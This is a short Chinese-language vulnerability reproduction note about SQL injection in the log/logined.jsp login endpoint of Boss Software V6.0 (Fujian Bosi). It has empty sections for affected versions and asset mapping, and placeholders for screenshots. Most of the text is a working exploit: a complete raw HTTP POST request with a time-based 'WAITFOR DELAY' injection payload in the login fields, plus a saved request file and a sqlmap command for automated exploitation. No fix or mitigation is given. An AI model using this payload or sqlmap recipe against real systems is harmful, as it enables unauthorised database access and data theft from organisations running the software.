博斯软件V6.0 存在 sql 注入

一、漏洞简介

福建博思软件股份有限公司博斯软件V6.0 log/logined.jsp存在SQL注入漏洞。

二、影响版本

三、资产测绘

1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe.png

四、漏洞复现

POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-1';WAITFOR DELAY '0:0:5'--

1697813144963-54dfd143-ad16-466e-accc-847ad43268c6.png

sqlmap

POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-2

sqlmap -r 1.txt --batch --level 3 --thread 5

1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07.png

更新: 2024-02-29 23:55:47
原文: https://www.yuque.com/xiaokp7/ocvun2/zprm44mso2ysykrg